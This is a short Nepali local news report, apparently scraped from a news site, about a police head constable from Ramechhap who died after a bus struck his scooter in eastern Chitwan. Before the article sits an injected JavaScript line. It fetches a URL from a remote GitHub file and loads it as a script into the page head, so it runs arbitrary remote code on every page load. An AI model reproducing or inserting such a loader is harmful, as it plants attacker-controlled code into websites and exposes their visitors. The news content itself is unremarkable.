;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन १६
रामेछाप । चितवनमा बसको ठक्करबाट रामेछाप जिल्लाको रामेछाप नगरपालिका वडा नम्बर ७ घर भएका अर्जुन कुमार थापाको मृत्यु भएको छ ।
पूर्वी चितवनको राप्तीनगरपालिका–५ भण्डारामा बा ३ ख १५४७ नम्बरको बसको ठक्करबाट प्रहरी हबल्दार समेत रहेका थापाको मृत्यु भएको हो । इलाका प्रहरी कार्यालय भण्डारामा कार्यरत थापा कार्यालय जाने क्रममा सवार प्रदेश ३–०३–००१ प् ६३२५ नम्बरको स्कुटरलाई बसले बिहिबार साँझ ठक्कर दिएको थियो ।
गम्भीर घाइते उनको पुरानो मेडिकल कलेज भरतपुरमा उपचारका क्रममा मृत्यु भएको हो । ठक्कर दिने बस र बसका चालकलाई प्रहरीले नियन्त्रणमा लिएको छ ।file Photo
फेसबुक प्रतिक्रियाहरु